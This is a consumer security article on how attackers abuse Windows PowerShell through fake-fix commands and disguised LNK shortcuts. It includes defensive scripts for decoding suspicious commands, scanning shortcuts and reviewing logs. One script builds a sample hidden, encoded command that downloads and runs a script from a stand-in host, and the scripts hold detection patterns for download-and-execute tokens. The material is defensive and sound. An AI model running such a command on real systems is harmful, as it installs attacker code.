Saturday, February 22, 2025


This Windows Tool Can Let In Viruses Without Detection


Whenever a Windows tool has advanced access to a computer, someone is in hot pursuit, trying to find ways to exploit it to run malware on people’s systems. PowerShell is no exception, and bad actors have found ways to use it to cause chaos on people’s computers.



But what is PowerShell, and how can it be abused?


What Is PowerShell on Windows?



Windows PowerShell is an advanced automation and configuration tool. You can use it to execute commands that tweak your system or to run scripts that carry out complex tasks for you. We covered this tool in our guide on what PowerShell is and the many things you can do with it.

PowerShell runs with whatever rights the user who launched it has, and it can change important settings or run system-sensitive scripts, so attackers look for ways to get it to execute code on their behalf. Before we dive into how it can be abused, it's worth noting that PowerShell itself is not a malicious app. It is a core part of Windows that can't simply be uninstalled, although administrators can restrict what it is allowed to run (for example, with AppLocker or Windows Defender Application Control, which put PowerShell into Constrained Language Mode when enforced).

What Makes PowerShell So Dangerous?

An example of Peaklight's code
Image Credit: Google Cloud


When an attacker wants to take advantage of PowerShell, they typically use one of two routes: tricking the user into pasting and running malicious code in PowerShell themselves, or handing them a file that launches a malicious script when it is opened.

Malicious Agents Convincing People to Run Commands

First, let's cover the case where an attacker tricks someone into running a PowerShell command. This trick usually involves scaring the victim into believing they need to run a PowerShell command to fix a problem that doesn't exist.

As reported by The Register, one such trick involves attackers compromising legitimate websites and changing them to display a fake error message. The error claims something is wrong with the user's copy of Windows, Google Chrome, Office, or OneDrive and, to fix this "issue," tells the user to run a PowerShell command that supposedly repairs the problem.


Of course, the given code doesn't repair anything. Instead, it tells PowerShell to reach out to a server the attacker controls, download a malicious executable, and run it. One instance of this attack used PowerShell to download a dropper, which then downloaded five more malware strains onto the target PC.

Another variant of this "user-activated" PowerShell attack was spotted being sent via email. The email included an HTML file designed to look like Microsoft Word. When opened, it claimed it couldn't display the Word document because an extension had stopped working. The user was then asked either to copy and paste malicious code into PowerShell to fix it or to download a malicious file that does the job for the attacker.
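The practical defence against both variants above is to read a command before you paste it. The following is an added example, not code from the original article, that decodes and flags a command of the kind described without executing it. The sample command, and the host name fix-update.example.invalid, are constructed for this example; the indicator list is this example's own choice, not an official one.

```powershell
# Added example, not from the original article: triage a command you have been
# told to paste into PowerShell WITHOUT running it.

function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # powershell.exe -e / -enc / -EncodedCommand takes Base64 of UTF-16LE text.
    if ($Command -match '(?i)-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try {
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
        } catch {
            return "<Base64 decode failed: $($_.Exception.Message)>"
        }
    }
    return $Command
}

function Test-SuspiciousCommand {
    param([Parameter(Mandatory)][string]$Command)
    $decoded  = Expand-EncodedCommand -Command $Command
    $haystack = "$Command`n$decoded"                 # check the wrapper and the payload
    # Tokens that rarely belong in a legitimate "fix" a stranger asks you to paste.
    $indicators = @(
        '(?i)-(e|ec|en|enc|encodedcommand)\s'          # hidden Base64 payload
        '(?i)-w(indowstyle)?\s+hidden'                # console hidden from the user
        '(?i)-(ep|ex|executionpolicy)\s+bypass'       # execution policy sidestepped
        '(?i)\b(iex|invoke-expression)\b'             # run a string as code
        '(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer'
        '(?i)\b(mshta|rundll32|regsvr32|certutil)\b'  # hand-off to other LOLBins
        '(?i)https?://\d{1,3}(\.\d{1,3}){3}'          # download straight from an IP
    )
    $hits = @(foreach ($pattern in $indicators) {
        if ($haystack -match $pattern) { $Matches[0] }
    })
    if ($hits.Count -ge 2)     { $verdict = 'Do not run' }
    elseif ($hits.Count -eq 1) { $verdict = 'Read it carefully first' }
    else                       { $verdict = 'No obvious red flags (still make sure you understand it)' }
    [pscustomobject]@{
        Decoded    = $decoded
        Indicators = $hits
        Verdict    = $verdict
    }
}

# Constructed sample resembling the fake "repair" command: hidden window,
# policy bypass, and a remote script from a made-up host piped into IEX.
$inner   = 'iex (New-Object Net.WebClient).DownloadString("http://fix-update.example.invalid/fix.ps1")'
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$Suspect = "powershell -w hidden -ep bypass -enc $b64"

Test-SuspiciousCommand -Command $Suspect | Format-List
```

Paste the real command you were given into $Suspect in place of the constructed one. The decoder only handles the -EncodedCommand form; attackers also nest layers (compressed streams, string reversal, character-code arrays), so a decoded payload that still looks like gibberish is itself a reason not to run it.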

Malicious Files Using PowerShell to Run Fileless Malware

The scarier version of the PowerShell attack is fileless. Here PowerShell carries out the malicious work directly in memory, taking its instructions from a script or a remote server rather than dropping a new executable on the victim's disk. Because there is no malicious file for a traditional file scanner to inspect, signature-based antivirus often misses it, which makes it harder to find and remove. It is not invisible, though: the Antimalware Scan Interface (AMSI) lets security products see script content as PowerShell runs it, and PowerShell's script block logging records the de-obfuscated code in the Windows event log.


We covered a sneaky version of this attack in our piece on malware that attacks illegal movie downloaders. This method usually disguises a LNK shortcut file as something else: the shortcut's target is powershell.exe with a malicious command line, so double-clicking the "file" runs the script. In the illegal movie example, the LNK was given a video-style name and icon to fool people into opening it. Explorer never displays the .lnk extension, so a file named movie.mp4.lnk shows up as movie.mp4, and the small arrow overlay on the icon is the only visible hint.
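As an added example that is not part of the original article, the following script reads a shortcut's real target and arguments through the WScript.Shell COM object instead of opening it, and flags LNK files that have a double extension or point at a script host. The trailer.mp4.lnk shortcut it creates under $env:TEMP is a harmless constructed sample (it points at powershell.exe with a Write-Host argument) so the scan has something to find offline; the extension and host-binary lists are this example's own.

```powershell
# Added example, not from the original article: read what a .lnk would launch
# without opening it, and flag double-extension lures and script-host targets.

function Get-SuspiciousShortcut {
    param([string]$Path = (Join-Path $env:USERPROFILE 'Downloads'))
    $shell = New-Object -ComObject WScript.Shell
    # Name patterns a lure borrows: "movie.mp4.lnk" is displayed as "movie.mp4".
    $lureExt  = '\.(mp4|mkv|avi|mov|pdf|docx?|xlsx?|txt|jpe?g|png)\.lnk$'
    $hostBins = 'powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|conhost|forfiles'
    $badArgs  = '-(e|ec|en|enc|encodedcommand)\s|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring|https?://'

    Get-ChildItem -Path $Path -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        # CreateShortcut on an existing .lnk parses it; nothing is executed.
        $lnk       = $shell.CreateShortcut($_.FullName)
        $target    = [string]$lnk.TargetPath
        $arguments = [string]$lnk.Arguments
        [pscustomobject]@{
            File           = $_.FullName
            DoubleExt      = [bool]($_.Name -match $lureExt)
            LaunchesHost   = [bool]($target -match "(^|\\)($hostBins)(\.exe)?$")
            ArgsSuspicious = [bool]($arguments -match $badArgs)
            Target         = $target
            Arguments      = $arguments
            Icon           = $lnk.IconLocation   # lures often borrow a media player's icon
        }
    } | Where-Object { $_.DoubleExt -or $_.LaunchesHost -or $_.ArgsSuspicious }
}

# Constructed, harmless sample so the scan has something to find offline:
# a "trailer" that is really a hidden-window PowerShell launcher.
$demoDir = Join-Path $env:TEMP 'lnk-lure-demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$demo = (New-Object -ComObject WScript.Shell).CreateShortcut((Join-Path $demoDir 'trailer.mp4.lnk'))
$demo.TargetPath = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$demo.Arguments  = '-w hidden -c "Write-Host demo-only"'
$demo.Save()

Get-SuspiciousShortcut -Path $demoDir | Format-List
```

Run it against your real Downloads folder by omitting -Path. A LNK whose arguments are suspiciously long, or whose target is cmd.exe or powershell.exe while the name promises a video or document, is the shape of the lure described above and should be deleted rather than opened.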

How to Avoid PowerShell Attacks

The problem with taking steps to avoid PowerShell attacks is that there are legitimate fixes out there that require you to enter commands into PowerShell. As such, before you enter a command, take some time to consider how trustworthy the source is, and make sure you understand what the command actually does.

If you're looking for a fix and a reputable site (Microsoft's own documentation, a long-standing community forum) explains a command and what it changes, it is usually fine to run it. If it arrives via a blaring fake error message designed to make you panic, or it tells you to paste something into a Run box or terminal you didn't open yourself, treat it as hostile. A few features should stop you on the spot: a long Base64 blob after -e or -EncodedCommand, -WindowStyle Hidden, -ExecutionPolicy Bypass, Invoke-Expression (iex), or anything that downloads content from a URL and runs it immediately.


If you see a command and are unsure what it does, try searching for it online. If it's legitimate, you should find other people explaining and recommending it. If you find nothing (or find someone reporting it as malicious), don't run it.

If you ran a malicious PowerShell command by mistake, disconnect the machine from the network and run a full scan with a reputable antivirus program. However, as we covered earlier, PowerShell attacks do their best to stay undetectable, so a clean scan does not prove the machine is clean. Check what actually ran: PowerShell's PSReadLine history file keeps the commands you typed or pasted, and if script block logging is enabled, event ID 4104 in the Microsoft-Windows-PowerShell/Operational log holds the script text. If you notice anything off after running a PowerShell command, your safest bet is a clean install of the operating system, and from a different device, change the passwords of accounts you used on the affected machine.
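Added example, not from the original article: what to pull from a machine after a suspicious command was run. It reads the PSReadLine history file and, where script block logging is on, event ID 4104 from the PowerShell operational log. Enable-ScriptBlockLogging is a small hypothetical helper that turns logging on for future sessions through the same registry value the group policy setting uses; it needs an elevated prompt. The indicator regex is this example's own choice, not an official list.

```powershell
# Added example, not from the original article: recover what PowerShell itself
# recorded after a suspicious command was run. Assumes Windows PowerShell 5.1+.

# Indicator regex chosen for this example (not an official list).
$Indicators = '-(e|ec|en|enc|encodedcommand)\s|-w(indowstyle)?\s+hidden|-(ep|executionpolicy)\s+bypass|\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|frombase64string'

function Enable-ScriptBlockLogging {
    # Hypothetical helper: turns on Script Block Logging for future sessions
    # (needs an elevated prompt). Same registry value the GPO setting writes.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Get-SuspiciousHistory {
    # PSReadLine keeps a plain-text per-user history of interactive commands,
    # including ones pasted in from a fake error page.
    if (-not (Get-Command Get-PSReadLineOption -ErrorAction SilentlyContinue)) { return }
    $histFile = (Get-PSReadLineOption).HistorySavePath
    if (Test-Path $histFile) {
        Get-Content $histFile | Where-Object { $_ -match $Indicators } | ForEach-Object {
            [pscustomobject]@{ Source = 'PSReadLine'; Time = $null; Path = $histFile; Text = $_ }
        }
    }
}

function Get-SuspiciousScriptBlocks {
    param([int]$Days = 7)
    # Event 4104 holds the script text as PowerShell compiled it, so -EncodedCommand
    # payloads and in-memory ("fileless") stages appear de-obfuscated here.
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value      # ScriptBlockText
        if ($text -match $Indicators) {
            [pscustomobject]@{
                Source = 'Event4104'
                Time   = $_.TimeCreated
                Path   = $_.Properties[4].Value     # script path; empty for pasted commands
                Text   = $text
            }
        }
    }
}

@(Get-SuspiciousHistory) + @(Get-SuspiciousScriptBlocks -Days 7) | Format-List
```

If Get-SuspiciousScriptBlocks returns nothing, check that the log exists and that logging was enabled before the incident; 4104 is only written from the point it is switched on, and an attacker with admin rights can clear the log, so an empty result is not evidence of a clean machine.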

By itself, PowerShell is a handy tool that gives you advanced control over your PC. However, some bad actors try to trick people into misusing it. Fortunately, if you keep your wits about you, you can avoid being hit by one.
